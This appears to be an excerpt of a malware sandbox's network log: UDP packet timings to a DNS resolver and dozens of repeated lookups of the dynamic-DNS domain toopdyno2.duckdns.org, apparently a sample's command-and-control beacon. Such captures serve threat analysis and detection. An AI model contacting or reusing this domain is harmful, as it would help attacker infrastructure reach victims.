                          Mar 15, 2022 17:31:04.200100899 CET53552128.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:04.314939976 CET6109053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:04.333100080 CET53610908.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:04.464378119 CET6458853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:04.480528116 CET53645888.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:04.586724043 CET6043353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:04.603451967 CET53604338.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:04.743300915 CET4934153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:04.760055065 CET53493418.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:04.868911028 CET5502053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:04.887797117 CET53550208.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.003274918 CET5686653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.020205975 CET53568668.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.140477896 CET6364153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.157500982 CET53636418.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.302018881 CET5585053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.320660114 CET53558508.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.432480097 CET5274553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.451251030 CET53527458.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.590307951 CET5197053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.608686924 CET53519708.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.727193117 CET6263753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.745346069 CET53626378.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:05.876609087 CET5568053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:05.893616915 CET53556808.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.011995077 CET5857953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.030781031 CET53585798.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.170305967 CET5082553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.189080954 CET53508258.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.307691097 CET6065853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.326080084 CET53606588.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.459723949 CET5940753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.476687908 CET53594078.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.622788906 CET6008253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.641040087 CET53600828.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.773586035 CET6147153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.792604923 CET53614718.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:06.920506954 CET5096253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:06.938914061 CET53509628.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.078668118 CET5733953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.095290899 CET53573398.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.211981058 CET5213653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.230721951 CET53521368.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.362025023 CET5782753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.381972075 CET53578278.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.494100094 CET5484853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.510577917 CET53548488.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.645273924 CET5437653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.662194014 CET53543768.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.778090000 CET5594853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.796895027 CET53559488.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:07.921013117 CET5578153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:07.937709093 CET53557818.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.057723045 CET5136453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.076034069 CET53513648.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.214864969 CET5796053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.231674910 CET53579608.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.354901075 CET5450753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.371432066 CET53545078.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.507189989 CET5237853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.523710012 CET53523788.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.635521889 CET5205353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.656258106 CET53520538.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.786840916 CET6041753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.803577900 CET53604178.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:08.917121887 CET5829053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:08.935734987 CET53582908.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.069210052 CET6335953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.087755919 CET53633598.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.198765039 CET5462953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.217596054 CET53546298.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.344814062 CET6144153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.361294985 CET53614418.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.483006001 CET6013653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.499265909 CET53601368.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.638520956 CET5231153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.656861067 CET53523118.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:09.774463892 CET5466753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:09.792067051 CET53546678.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:10.027264118 CET6304053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:10.046315908 CET53630408.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:10.196377993 CET5575253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:10.214607000 CET53557528.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:10.330777884 CET5287853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:10.349523067 CET53528788.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:10.516364098 CET5766253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:10.536420107 CET53576628.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:10.658179045 CET5222153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:10.677119017 CET53522218.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:11.306992054 CET4933353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:11.325301886 CET53493338.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:11.481993914 CET5251453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:11.501902103 CET53525148.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:13.855866909 CET4974953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:13.874360085 CET53497498.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:14.470480919 CET5306953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:14.489401102 CET53530698.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:14.615401983 CET6189153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:14.632725954 CET53618918.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:14.744911909 CET6144753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:14.763488054 CET53614478.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:14.896245956 CET5826253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:14.915133953 CET53582628.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.026983023 CET6302053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.045221090 CET53630208.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.180756092 CET6345353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.200653076 CET53634538.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.323101997 CET5255553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.341412067 CET53525558.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.475526094 CET5287353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.493829012 CET53528738.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.608942032 CET5091453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.627440929 CET53509148.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.774727106 CET5554053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.791873932 CET53555408.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:15.906936884 CET6446453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:15.925592899 CET53644648.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.100706100 CET6332753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.116930008 CET53633278.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.229672909 CET5672753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.248106003 CET53567278.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.379829884 CET5235853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.396482944 CET53523588.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.510421991 CET4968953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.529392958 CET53496898.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.645801067 CET5981353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.664040089 CET53598138.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.779619932 CET4988853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.795887947 CET53498888.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:16.923026085 CET5171853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:16.941684961 CET53517188.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.061486006 CET5585953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.079732895 CET53558598.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.212671041 CET6472953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.231422901 CET53647298.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.337810993 CET5217253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.354827881 CET53521728.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.486799955 CET6447453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.503597021 CET53644748.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.618781090 CET6255953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.635490894 CET53625598.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.770823002 CET5267253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.787503958 CET53526728.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:17.903266907 CET5076653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:17.919666052 CET53507668.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.039078951 CET6250253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.058301926 CET53625028.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.178113937 CET5620753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.196475029 CET53562078.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.315351009 CET6289153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.331981897 CET53628918.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.451560020 CET6518153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.470560074 CET53651818.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.597878933 CET4957253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.614809990 CET53495728.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.728010893 CET5936753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.744611025 CET53593678.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.863476038 CET5557453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:18.881711006 CET53555748.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:18.994781017 CET5955653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.013922930 CET53595568.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.159801006 CET4996253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.178025007 CET53499628.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.293051958 CET6032553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.311510086 CET53603258.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.449517012 CET5988953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.467772007 CET53598898.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.588749886 CET6388253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.607217073 CET53638828.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.723443031 CET5979853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.739722013 CET53597988.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:19.854664087 CET5230253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:19.873919010 CET53523028.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.005142927 CET6125553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.023967981 CET53612558.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.140417099 CET5264353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.159403086 CET53526438.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.296498060 CET5553453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.314868927 CET53555348.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.463917971 CET5087853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.482642889 CET53508788.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.612943888 CET5614153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.631684065 CET53561418.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.744800091 CET6155253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.762950897 CET53615528.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:20.878829002 CET6200353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:20.897253036 CET53620038.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.009624958 CET5785953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.028074026 CET53578598.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.142291069 CET5354253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.161334038 CET53535428.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.277354956 CET5824353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.295597076 CET53582438.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.473665953 CET6217253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.490575075 CET53621728.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.603286028 CET6336353192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.622051001 CET53633638.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.743912935 CET5068953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.765436888 CET53506898.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:21.886195898 CET6202453192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:21.904874086 CET53620248.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.039921999 CET6411753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.061289072 CET53641178.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.197942019 CET5927153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.215473890 CET53592718.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.332823038 CET6308853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.353543043 CET53630888.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.464502096 CET6488053192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.482768059 CET53648808.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.617088079 CET5075153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.633553028 CET53507518.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.756078959 CET5950753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.774260044 CET53595078.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:22.895536900 CET5075853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:22.913913965 CET53507588.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.030410051 CET5564753192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.047209978 CET53556478.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.177103996 CET5437953192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.195261955 CET53543798.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.308147907 CET5444653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.324580908 CET53544468.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.442665100 CET5505853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.460838079 CET53550588.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.574049950 CET5840653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.592219114 CET53584068.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.713648081 CET6076153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.731934071 CET53607618.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.855782032 CET5238153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:23.872172117 CET53523818.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:23.994050026 CET6194553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:24.012712955 CET53619458.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:24.545664072 CET4993553192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:24.564472914 CET53499358.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:24.681646109 CET5995253192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:24.700397968 CET53599528.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:24.814217091 CET5170853192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:24.832451105 CET53517088.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:24.948925018 CET6240653192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:24.965207100 CET53624068.8.8.8192.168.2.4
                          Mar 15, 2022 17:31:25.083853960 CET5991153192.168.2.48.8.8.8
                          Mar 15, 2022 17:31:25.102082968 CET53599118.8.8.8192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Mar 15, 2022 17:29:33.651638985 CET192.168.2.48.8.8.80xa119Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:33.782334089 CET192.168.2.48.8.8.80x95c3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.036942959 CET192.168.2.48.8.8.80xb26Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.308057070 CET192.168.2.48.8.8.80x77b3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.442190886 CET192.168.2.48.8.8.80x3600Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.687438011 CET192.168.2.48.8.8.80x2dcaStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:34.814285040 CET192.168.2.48.8.8.80xbdb5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.338607073 CET192.168.2.48.8.8.80x18afStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.524545908 CET192.168.2.48.8.8.80xd951Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:35.774442911 CET192.168.2.48.8.8.80x3f3dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:36.006824970 CET192.168.2.48.8.8.80xe7fcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:36.933866978 CET192.168.2.48.8.8.80x606cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:37.064917088 CET192.168.2.48.8.8.80xd46cStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:37.287226915 CET192.168.2.48.8.8.80x6082Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:37.445935965 CET192.168.2.48.8.8.80x3a97Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.018778086 CET192.168.2.48.8.8.80xbf05Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.225986958 CET192.168.2.48.8.8.80x9e03Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.426934004 CET192.168.2.48.8.8.80x4acbStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.564747095 CET192.168.2.48.8.8.80xd74eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.752434969 CET192.168.2.48.8.8.80x3ea6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:39.880841017 CET192.168.2.48.8.8.80xbeebStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.085488081 CET192.168.2.48.8.8.80xe9f1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.221793890 CET192.168.2.48.8.8.80xf38dStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.445584059 CET192.168.2.48.8.8.80x8e9eStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.675976992 CET192.168.2.48.8.8.80xba1aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.833786011 CET192.168.2.48.8.8.80x5115Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:40.970649958 CET192.168.2.48.8.8.80x4d80Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.121135950 CET192.168.2.48.8.8.80xd74aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.260839939 CET192.168.2.48.8.8.80xf8b7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.412688971 CET192.168.2.48.8.8.80x20acStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.548872948 CET192.168.2.48.8.8.80xcba2Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.725845098 CET192.168.2.48.8.8.80x6d75Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:41.863840103 CET192.168.2.48.8.8.80x2db6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.031074047 CET192.168.2.48.8.8.80x6153Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.160312891 CET192.168.2.48.8.8.80xac53Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.307542086 CET192.168.2.48.8.8.80x9da9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.450249910 CET192.168.2.48.8.8.80xcd2bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.802218914 CET192.168.2.48.8.8.80x1a8aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:42.949054956 CET192.168.2.48.8.8.80x81a8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.146797895 CET192.168.2.48.8.8.80x19e3Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.282538891 CET192.168.2.48.8.8.80x4cc5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.426948071 CET192.168.2.48.8.8.80x2b1Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.566771030 CET192.168.2.48.8.8.80xafeStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.729366064 CET192.168.2.48.8.8.80x72f5Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:43.876286030 CET192.168.2.48.8.8.80xa8f9Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.020605087 CET192.168.2.48.8.8.80x8de6Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.161935091 CET192.168.2.48.8.8.80x8a40Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.330892086 CET192.168.2.48.8.8.80x56a8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.470763922 CET192.168.2.48.8.8.80x9759Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.616122961 CET192.168.2.48.8.8.80x643aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.763029099 CET192.168.2.48.8.8.80x7fa7Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:44.912642002 CET192.168.2.48.8.8.80x6f68Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.087533951 CET192.168.2.48.8.8.80xb653Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.246918917 CET192.168.2.48.8.8.80xdd0bStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.390173912 CET192.168.2.48.8.8.80xf674Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.553154945 CET192.168.2.48.8.8.80x4a26Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.703840971 CET192.168.2.48.8.8.80xfa11Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:45.866297960 CET192.168.2.48.8.8.80x70b0Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.002796888 CET192.168.2.48.8.8.80xf350Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.207511902 CET192.168.2.48.8.8.80x6464Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.348690987 CET192.168.2.48.8.8.80x99fcStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.514894009 CET192.168.2.48.8.8.80x71faStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.643882990 CET192.168.2.48.8.8.80xd9d8Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.793755054 CET192.168.2.48.8.8.80x390aStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:46.946621895 CET192.168.2.48.8.8.80x6d60Standard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
                          Mar 15, 2022 17:29:47.097793102 CET192.168.2.48.8.8.80x934fStandard query (0)toopdyno2.duckdns.orgA (IP address)IN (0x0001)
